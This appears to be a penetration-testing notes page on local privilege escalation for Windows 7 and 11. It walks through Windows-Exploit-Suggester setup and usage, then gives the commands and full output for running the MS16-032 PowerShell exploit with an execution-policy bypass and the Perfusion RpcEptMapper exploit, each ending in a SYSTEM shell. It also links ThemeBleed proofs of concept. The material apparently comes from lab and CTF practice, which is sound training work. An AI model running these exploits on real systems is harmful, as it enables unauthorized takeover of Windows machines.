Windows Desktop Versions

Windows 7

LogoGitHub - AonCyberLabs/Windows-Exploit-Suggester: This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.GitHub
$ sudo wget https://files.pythonhosted.org/packages/28/84/27df240f3f8f52511965979aad7c7b77606f8fe41d4c90f2449e02172bb1/setuptools-2.0.tar.gz
$ sudo tar -xf setuptools-2.0.tar.gz
$ cd setuptools-2.0/
$ sudo python2.7 setup.py install

$ sudo wget https://files.pythonhosted.org/packages/42/85/25caf967c2d496067489e0bb32df069a8361e1fd96a7e9f35408e56b3aab/xlrd-1.0.0.tar.gz
$ sudo tar -xf xlrd-1.0.0.tar.gz
$ cd xlrd-1.0.0/
$ sudo python2.7 setup.py install
C:\htb> systeminfo
sudo python2.7 windows-exploit-suggester.py --update
python2.7 windows-exploit-suggester.py  --database 2021-05-13-mssb.xls --systeminfo win7lpe-systeminfo.txt
LogoMetasploit Local Exploit Suggester: Do Less, Get More! | Rapid7 BlogRapid7

Exploiting MS16-032

LogoMicrosoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) - Local Privilege Escalation (MS16-032) (PowerShell)Exploit Database
PS C:\htb> Set-ExecutionPolicy bypass -scope process

Execution Policy Change
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose
you to the security risks described in the about_Execution_Policies help topic. Do you want to change the execution
policy?
[Y] Yes  [N] No  [S] Suspend  [?] Help (default is "Y"): A
[Y] Yes  [N] No  [S] Suspend  [?] Help (default is "Y"): Y


PS C:\htb> Import-Module .\Invoke-MS16-032.ps1
PS C:\htb> Invoke-MS16-032

         __ __ ___ ___   ___     ___ ___ ___
        |  V  |  _|_  | |  _|___|   |_  |_  |
        |     |_  |_| |_| . |___| | |_  |  _|
        |_|_|_|___|_____|___|   |___|___|___|

                       [by b33f -> @FuzzySec]

[?] Operating system core count: 6
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 1656

[*] Sniffing out privileged impersonation token..

[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[?] Success, open SYSTEM token handle: 1652
[+] Resuming thread..

[*] Sniffing out SYSTEM shell..

[>] Duplicating SYSTEM token
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!

RpcEptMapper Registry Key Vulnerability

LogoAn Unconventional Exploit for the RpcEptMapper Registry Key Vulnerabilityitm4n’s blog
LogoGitHub - itm4n/Perfusion: Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)GitHub

Compiled version:

LogoWin7_Server2008_PrivEsc/Perfusion.exe at main · 0xSs0rZ/Win7_Server2008_PrivEscGitHub
PS C:\Users\ldapreader\Desktop>  .\Perfusion.exe -c cmd -i
[*] Created Performance DLL: C:\Users\LDAPRE~1\AppData\Local\Temp\2\performance_2976_2900_2.dll
[*] Created Performance registry key.
[*] Triggered Performance data collection.
[+] Exploit completed. Got a SYSTEM token! :)
[*] Waiting for the Trigger Thread to terminate... OK
[!] Failed to delete Performance registry key.
[*] Deleted Performance DLL.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\ldapreader\Desktop>whoami
nt authority\system

Windows 11 - ThemeBleed

LogoGitHub - Jnnshschl/CVE-2023-38146: PoC for the ThemeBleed Windows 11 CVE-2023-38146 written in python using impacket. https://jnns.de/posts/cve-2023-38146-poc/GitHub
LogoGitHub - exploits-forsale/themebleed: Proof-of-Concept for CVE-2023-38146 ("ThemeBleed")GitHub
LogoHTB: Aero0xdf hacks stuff
PreviousWindows ServerNextWindows Processes

Last updated